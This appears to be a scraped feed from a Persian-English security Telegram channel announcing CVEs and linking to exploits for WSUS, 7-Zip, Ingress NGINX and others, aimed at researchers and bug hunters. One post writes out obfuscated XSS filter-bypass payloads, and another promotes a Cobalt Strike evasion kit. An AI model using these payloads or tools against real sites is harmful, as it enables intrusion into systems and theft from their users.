RadvanSec – Telegram
RadvanSec
989 subscribers
181 photos
27 videos
142 files
595 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
Exploiting 7-zip
CVE-2025-11001 / CVE-2025-11002

Exploit

⭐️ @RadvanSec
👍32
CVE-2025-23298
Remote Code Execution in NVIDIA Merlin

PoC + Exploit

⭐️ @RadvanSec
👍31
Forwarded from RadvanSec (Sin0x001)
CVE-2025-55315
ASP.NET Kestrel has inconsistencies in HTTP parsing that allow an authenticated attacker to bypass network defenses via HTTP request/response smuggling.

PoC
👍3
“یادگیری هوش مصنوعی الان مثل خرید بیت کوین توی 2013 می‌مونه!”

موافقا لایک مخالفا دیسلایک 👍

⭐️ @RadvanSec
👍27👎13
CVE-2025-40778
BIND 9 Cache Poisoning via Unsolicited Answer Records

⭐️ @RadvanSec
2👍2
مایکروسافت آپدیت خاص (out-of-band) برای وصله کردن یک نقص بحرانی در Windows Server Update Services (WSUS) منتشر کرده است.

شناسه‌ی این آسیب‌پذیری CVE-2025-59287 است.

اگر سرور ویندوزی نقش WSUS فعال داشته باشه، مهاجم بدون احراز هویت می‌تونه کدی به صورت Remote اجرا کنه با امتیازات SYSTEM.

مایکروسافت اعلام کرده این نقص امکان wormable شدن (پراکنده شدن خودکار در شبکه‌ی سرورهای WSUS) رو داره.

لیست نسخه‌های ویندوز سرور آسیب‌پذیر و آپدیت‌ها به ترتیب: Windows Server 2025، 23H2، 2022، 2019، 2016، 2012 R2 و 2012.

⭐️ @RadvanSec
2👌1
🛑 انتشار PoC Exploit برای آسیب‌پذیری حیاتی در WSUS

◀️یک PoC Exploit برای آسیب‌پذیری بحرانی در سرویس WSUS مایکروسافت منتشر شده است که به مهاجم بدون احراز هویت اجازه می‌دهد کد دلخواه را با سطح دسترسی SYSTEM روی سرورهای آسیب‌پذیر اجرا کند.

◀️این آسیب‌پذیری با شناسه CVE-2025-59287 و امتیاز CVSS 9.8 شناسایی شده و ناشی از ضعف در فرآیند deserialization داده‌های غیرقابل اعتماد در بخش AuthorizationCookie است.

◀️مایکروسافت این نقص را در Patch Tuesday اکتبر 2025 اصلاح کرده است. بهره‌برداری موفق می‌تواند زیرساخت به‌روزرسانی سازمانی را کاملاً در معرض خطر قرار دهد و منجر به تسلط کامل مهاجم بر سرور WSUS شود.


https://gist.github.com/hawktrace/880b54fb9c07ddb028baaae401bd3951



⭐️ @RadvanSec
3
اسم پروژه: Translate Shell (فرمان trans).

پشت صحنه: می‌تونه از چند موتور ترجمه استفاده کنه (Google پیش‌فرض، همچنین Bing، Yandex، Apertium و ...).

نیاز به اینترنت دارد (مگر زمانی که از دیکشنری‌های آفلاین مثل Stardict یا مدل محلی استفاده کنی).



نصب (سریع)

Debian / Ubuntu

sudo apt update
sudo apt install translate-shell
# یا اگر در repo نیست:
wget git.io/trans
chmod +x trans
sudo mv trans /usr/local/bin/

Fedora

sudo dnf install translate-shell

Arch (AUR)

paru -S translate-shell   # یا yaourt/pacman-AUR مورد علاقه‌ات
از سورس / دستی

https://github.com/soimort/translate-shell



⭐️ @RadvanSec
2
از جابه‌جا شدن بین تب‌ها برای OSINT (اطلاعات متن‌باز — Open Source Intelligence) و Recon (شناسایی و بازشناسی) خسته‌اید؟ فقط به Discord ما بپیوندید و تایپ کنید sudo help (فرمان‌نما برای اجرا با دسترسی ادمین در لینوکس/یونیکس) تا ابزارهای قدرتمند در عرض چند ثانیه باز شود!

IP & Domain Lookup (جست‌وجوی آدرس IP و دامنه)
Email & Phone OSINT (جمع‌آوری اطلاعات ایمیل و شماره تلفن — OSINT)
Subdomain Enumeration (پیمایش زیردامنه‌ها)
Reverse Image Search (جست‌وجوی معکوس تصویر)
URL & Virus Scanners (اسکنر آدرس‌ها و بدافزار)
Temp Email (ایمیل موقت)، QR Tools (ابزارهای کد QR)، و موارد دیگر

🌟 می‌توانید در یک دقیقه CTF بسازید و بازی کنید — درست داخل Discord!

همین حالا امتحان کنید — سریع، ساده و همه‌چیز در یک چت.
🔗 [https://discord.gg/u7uMFV833h](https://discord.gg/u7uMFV833h)

#ctf #bugbounty #osint #cybersecurity #discordtools #infosec

⭐️ @RadvanSec
3
XSS Bypass

Payloads:

<img+src%3Dx+onerror%3D"%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041">


--'<00 foo="<a%20href="javanoscript​:prompt(404)">XSS-Click</00>--%20//
2👌1
Forwarded from GO-TO CVE (| | Sharo K h | |)
<<https:X55.is/onfocus=1?import(tagName):1+AutoFocus+ContentEditable>>
1👍1👌1
RadvanSec
BugBounty Program Google Dorks (part2): inurl:/security ext:txt "contact" "powered by synack" intext:responsible disclosure bounty inurl: private bugbountyprogram inurl:/.well-known/security ext:txt inurl:/.well-known/security ext:txt intext:hackerone inurl:/.well…
https://news.1rj.ru/str/bbprograms

علاوه بر دورک هایی که در پیام ریپلی شده موجوده، میتونین برای پیدا کردن تارگت های خارج پلتفرم باگ بانتی، از این چنل استفاده کنین

⭐️ @RadvanSec
7
Crystal Kit
Evasion for Cobalt Strike

https://github.com/rasta-mouse/Crystal-Kit

⭐️ @RadvanSec
2🔥1
CVE-2025-24071
Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar archive, leading to NTLM hash disclosure. The user does not need to open or execute the file simply extracting it is enough to trigger the leak.
-------------------------
«Windows Explorer به‌طور خودکار وقتی یک فایل .library-ms از یک آرشیو .rar استخراج می‌شود، یک درخواست احراز هویت SMB (پروتکل اشتراک فایل مایکروسافت) آغاز می‌کند که منجر به افشای هش NTLM (هشِ پروتکل احراز هویت ویندوز) می‌شود. کاربر نیازی به باز کردن یا اجرای فایل ندارد — صرفِ استخراج آن کافی است تا نشت رخ دهد.»

Exploit

⭐️ @RadvanSec
5
Media is too big
VIEW IN TELEGRAM
Generative AI for OSINT: Next Level Techniques for ChatGPT and Beyond

⭐️ @RadvanSec
2
Exploit for Ingress NGINX - IngressNightmare

This project provides an exploit targeting critical unauthenticated Remote Code Execution (RCE) vulnerabilities in the Ingress NGINX Controller for Kubernetes, collectively referred to as IngressNightmare. (Research by Wiz)

In the original research, the Wiz team did not provide a PoC or a functional exploit, so we decided to create our own and share it with the community.

——————————————————
اکسپلویت برای Ingress NGINX - IngressNightmare

این پروژه اکسپلویتی را ارائه می‌دهد که آسیب‌پذیری‌های حیاتی اجرای کد از راه دور (RCE) احراز هویت نشده در کنترلر Ingress NGINX برای Kubernetes، که به طور کلی IngressNightmare نامیده می‌شود، را هدف قرار می‌دهد. (تحقیق توسط Wiz)

در تحقیق اصلی، تیم Wiz یک PoC یا یک اکسپلویت کاربردی ارائه نکرد، بنابراین ما تصمیم گرفتیم خودمان آن را ایجاد کنیم و با جامعه به اشتراک بگذاریم.

Exploit

⭐️ @RadvanSec
👍21